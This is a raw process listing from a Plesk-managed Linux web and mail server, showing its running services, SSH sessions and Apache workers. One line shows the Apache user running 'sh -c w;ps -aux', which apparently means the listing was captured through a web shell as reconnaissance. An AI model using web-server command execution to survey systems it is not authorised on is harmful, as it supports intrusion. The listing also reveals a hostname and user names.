Jul27 0:00 postgres: logger process postgres 2973 0.0 0.0 21248 948 ? S Jul27 0:00 postgres: writer process postgres 2974 0.0 0.0 12028 768 ? S Jul27 0:00 postgres: stats buffer process postgres 2975 0.0 0.0 11212 948 ? S Jul27 0:00 postgres: stats collector process drweb 3167 0.2 3.8 122892 119308 ? Ss Jul27 13:13 drwebd.real root 3186 0.0 0.3 41216 10008 ? S Jul27 0:24 /usr/bin/sw-engine -c /usr/local/psa/admin/conf/php.ini /usr/lib/plesk-9.0/psa-health-monitor-notification.php root 3200 0.6 0.0 71956 2632 ? Ssl Jul27 31:31 /usr/sbin/sw-collectd -C /etc/sw-collectd/collectd.conf root 3219 0.0 0.0 5380 1132 ? Ss Jul27 0:00 crond xfs 3244 0.0 0.0 3264 992 ? Ss Jul27 0:00 xfs -droppriv -daemon root 3269 0.0 0.0 2360 436 ? Ss Jul27 0:00 /usr/sbin/atd avahi 3296 0.0 0.0 2696 1300 ? Ss Jul27 0:00 avahi-daemon: running [ip-173-201-44-217.local] avahi 3297 0.0 0.0 2696 432 ? Ss Jul27 0:00 avahi-daemon: chroot helper 68 3310 0.0 0.1 5788 3780 ? Ss Jul27 0:00 hald root 3311 0.0 0.0 3264 988 ? S Jul27 0:00 hald-runner 68 3319 0.0 0.0 2108 816 ? S Jul27 0:00 hald-addon-acpi: listening on acpid socket /var/run/acpid.socket root 3348 0.0 0.0 33228 532 ? Sl Jul27 0:00 /usr/bin/hptsvr root 3650 0.0 0.3 26128 10404 ? SN Jul27 0:00 /usr/bin/python -tt /usr/sbin/yum-updatesd root 3653 0.0 0.0 2656 1136 ? SN Jul27 0:00 /usr/libexec/gam_server root 3707 0.0 0.0 3612 428 ? S Jul27 0:00 /usr/sbin/smartd -q never root 3711 0.0 0.0 1748 440 tty2 Ss+ Jul27 0:00 /sbin/mingetty tty2 root 3712 0.0 0.0 1748 444 tty3 Ss+ Jul27 0:00 /sbin/mingetty tty3 root 3713 0.0 0.0 1748 464 tty4 Ss+ Jul27 0:00 /sbin/mingetty tty4 root 3716 0.0 0.0 1748 444 tty5 Ss+ Jul27 0:00 /sbin/mingetty tty5 root 3718 0.0 0.0 1748 444 tty6 Ss+ Jul27 0:00 /sbin/mingetty tty6 root 5002 0.0 0.0 1748 440 tty1 Ss+ Jul27 0:00 /sbin/mingetty tty1 root 9735 0.0 0.0 2940 552 ? S Jul29 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrloggername=imapd -maxprocs=40 -maxperip=4 -pid=/var/run/imapd.pid -nodnslookup -noidentlookup 143 /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir root 9737 0.0 0.0 1616 244 ? S Jul29 0:00 /usr/sbin/courierlogger imapd root 9745 0.0 0.0 2940 568 ? S Jul29 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrloggername=imapd-ssl -maxprocs=40 -maxperip=4 -pid=/var/run/imapd-ssl.pid -nodnslookup -noidentlookup 993 /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir root 9747 0.0 0.0 1616 244 ? S Jul29 0:00 /usr/sbin/courierlogger imapd-ssl root 9753 0.0 0.0 2940 568 ? S Jul29 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrloggername=pop3d -maxprocs=40 -maxperip=4 -pid=/var/run/pop3d.pid -nodnslookup -noidentlookup 110 /usr/sbin/pop3login /usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir root 9755 0.0 0.0 1616 244 ? S Jul29 0:00 /usr/sbin/courierlogger pop3d root 9762 0.0 0.0 2940 552 ? S Jul29 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrloggername=pop3d-ssl -maxprocs=40 -maxperip=4 -pid=/var/run/pop3d-ssl.pid -nodnslookup -noidentlookup 995 /usr/bin/couriertls -server -tcpd /usr/sbin/pop3login /usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir root 9764 0.0 0.0 1616 244 ? S Jul29 0:00 /usr/sbin/courierlogger pop3d-ssl root 10009 0.0 0.0 0 0 ? S 12:50 0:00 [pdflush] root 11853 0.0 0.9 34508 29812 ? Ss Jul29 0:00 /usr/bin/spamd --username=popuser --daemonize --nouser-config --helper-home-dir=/var/qmail --max-children 5 --create-prefs --virtual-config-dir=/var/qmail/mailnames/%d/%l/.spamassassin --pidfile=/var/run/spamd/spamd_full.pid --socketpath=/tmp/spamd_full.sock popuser 11854 0.0 0.9 34508 28388 ? S Jul29 0:00 spamd child popuser 11855 0.0 0.9 34508 28312 ? S Jul29 0:00 spamd child 503 17229 0.0 0.2 10356 6568 ? S Jul27 0:43 /usr/sbin/sw-cp-serverd -f /etc/sw-cp-server/config root 18794 0.0 0.0 4628 1216 ? S Jul27 0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock --log-error=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.pid --user=mysql mysql 18844 0.3 1.0 150116 32948 ? Sl Jul27 17:10 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --socket=/var/lib/mysql/mysql.sock postfix 20135 0.0 0.0 7036 1780 ? S 14:37 0:00 pickup -l -t fifo -u -o content_filter smtp:127.0.0.1:10027 postfix 20730 0.0 0.0 7728 2544 ? S Jul28 0:05 qmgr -l -t fifo -u postfix 20733 0.0 0.0 7072 1940 ? S Jul28 0:00 tlsmgr -l -t unix -u root 23510 0.0 0.1 12000 3420 ? Ss 09:42 0:00 sshd: bjmsuper [priv] bjmsuper 23516 0.0 0.0 12000 1852 ? S 09:42 0:00 sshd: bjmsuper@pts/0 bjmsuper 23517 0.0 0.0 4632 1476 pts/0 Ss 09:42 0:00 -bash root 23545 0.0 0.0 9404 2092 pts/0 S 09:42 0:00 su - root 23546 0.0 0.0 4752 1444 pts/0 S+ 09:42 0:00 -bash root 24221 0.0 0.0 7220 1056 ? Ss Jul28 0:00 /usr/sbin/sshd drweb 25217 0.0 3.8 122892 117976 ? S 15:30 0:00 drwebd.real drweb 25218 0.0 3.8 122892 117980 ? S 15:30 0:00 drwebd.real drweb 25219 0.0 3.8 122892 117980 ? S 15:30 0:00 drwebd.real drweb 25220 0.0 3.8 122892 117980 ? S 15:30 0:00 drwebd.real named 26286 0.0 0.2 75300 6296 ? Ssl Jul27 0:03 /usr/sbin/named -u named -c /etc/named.conf -u named -t /var/named/run-root root 28663 0.0 0.0 0 0 ? S 15:48 0:00 [pdflush] root 29137 0.0 0.6 44620 20492 ? Ss 15:48 0:00 /usr/sbin/httpd apache 29139 0.0 0.2 30444 8224 ? S 15:48 0:00 /usr/sbin/httpd apache 29140 0.0 0.8 54880 26848 ? S 15:48 0:00 /usr/sbin/httpd apache 29141 0.0 0.5 45352 16812 ? S 15:48 0:00 /usr/sbin/httpd apache 29142 0.0 0.5 45188 16312 ? S 15:48 0:00 /usr/sbin/httpd apache 29143 0.0 0.8 54820 26052 ? S 15:48 0:00 /usr/sbin/httpd apache 29145 0.0 0.5 45368 16896 ? S 15:48 0:00 /usr/sbin/httpd apache 29146 0.0 0.5 45516 16564 ? S 15:48 0:00 /usr/sbin/httpd apache 29148 0.0 0.5 45536 16508 ? S 15:48 0:00 /usr/sbin/httpd apache 29194 0.0 0.8 54796 26952 ? S 15:48 0:00 /usr/sbin/httpd apache 29195 0.0 0.5 45404 16312 ? S 15:48 0:00 /usr/sbin/httpd apache 29197 0.0 0.8 54844 25836 ? S 15:48 0:00 /usr/sbin/httpd apache 29198 0.0 0.5 45224 15928 ? S 15:48 0:00 /usr/sbin/httpd apache 29199 0.0 0.5 45232 15828 ? S 15:48 0:00 /usr/sbin/httpd apache 29200 0.0 0.8 54872 26868 ? S 15:48 0:00 /usr/sbin/httpd apache 29201 0.0 0.5 45268 17176 ? S 15:48 0:00 /usr/sbin/httpd apache 29202 0.0 0.5 45196 15784 ? S 15:48 0:00 /usr/sbin/httpd apache 29203 0.0 0.8 54908 27108 ? S 15:48 0:00 /usr/sbin/httpd apache 29205 0.0 0.5 45376 16368 ? S 15:48 0:00 /usr/sbin/httpd apache 29206 0.0 0.8 54844 26268 ? S 15:48 0:00 /usr/sbin/httpd apache 29207 0.0 0.5 45444 16520 ? S 15:48 0:00 /usr/sbin/httpd apache 29465 0.1 0.5 45152 15460 ? S 15:57 0:00 /usr/sbin/httpd apache 29617 0.0 0.0 2548 984 ? S 16:00 0:00 sh -c w;ps -aux apache 29620 0.0 0.0 2276 824 ? R 16:00 0:00 ps -aux root 30158 0.0 0.1 12136 3224 ? Ss Jul29 0:03 sshd: root@pts/1 root 30168 0.0 0.0 4748 1536 pts/1 Ss+ Jul29 0:00 -bash